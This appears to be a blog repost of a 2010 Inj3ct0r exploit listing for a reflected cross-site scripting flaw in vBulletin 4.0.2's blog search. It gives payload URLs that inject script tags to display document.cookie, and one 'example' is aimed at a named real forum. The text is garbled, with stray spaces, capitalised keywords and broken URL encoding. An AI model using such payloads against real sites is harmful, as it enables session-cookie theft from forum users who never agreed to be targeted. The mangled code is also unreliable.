From YJPS S BLOG
======================================
Vbulletin 4.0.2 XSS Vulnerability
======================================
[+] Vbulletin 4.0.2 XSS Vulnerability
1-=- =-= 0
0 _ 1
1/_ '/\__/_ '0
0/\ _, ___/\ _ ___, _/_ ___ 1
1/_ '/_ \ _ <_/___/' _ 0
0 // \__/\_\_/1
1 \_\_\_\_ \____/\____ \\__ \\____/\_ 0
0/_/\ _/___/____/_/___/_/1
1 \____/> Exploit database separated by exploit 0
0/___/type (local, remote, DoS, etc.) 1
1 1
0 [+] Site: Inj3ct0r.com 0
1 [+] Support e-mail: submit [at] inj3ct0r.com 1
0 0
1 ###################################### 1
0 Im 5ubzer0 member from Inj3ct0r Team 1
1 ###################################### 0
0-=- =-1
[+] Discovered By: 5ubzer0
[+] My id: http://inj3ct0r.com/author/2307
[+] Original: http://inj3ct0r.com/exploits/9697
# Version: Vbulletin 4.0.2
Www.site.com/path/search.
Php? Search_type = 1 & contenttype = vBBlog_BlogEntry & query = "> <script
> Alert (xss); </script>
Www.site.com/path/search.
Php? Search_type = 1 & contenttype = vBBlog_BlogEntry & query = "> <script
> Alert (document. cookie); </script>
Exemple:
[Url] http://www.forumjogosonline.com.br/search.
Php? Search_type = 1 & contenttype = vBBlog_BlogEntry & query = % 22% 3E % 3
Cscript % 3 Ealert % 28document. cookie % 29; % 3C/script % 3E [/url]
# Inj3ct0r.com [2010-03-19]
To test successfully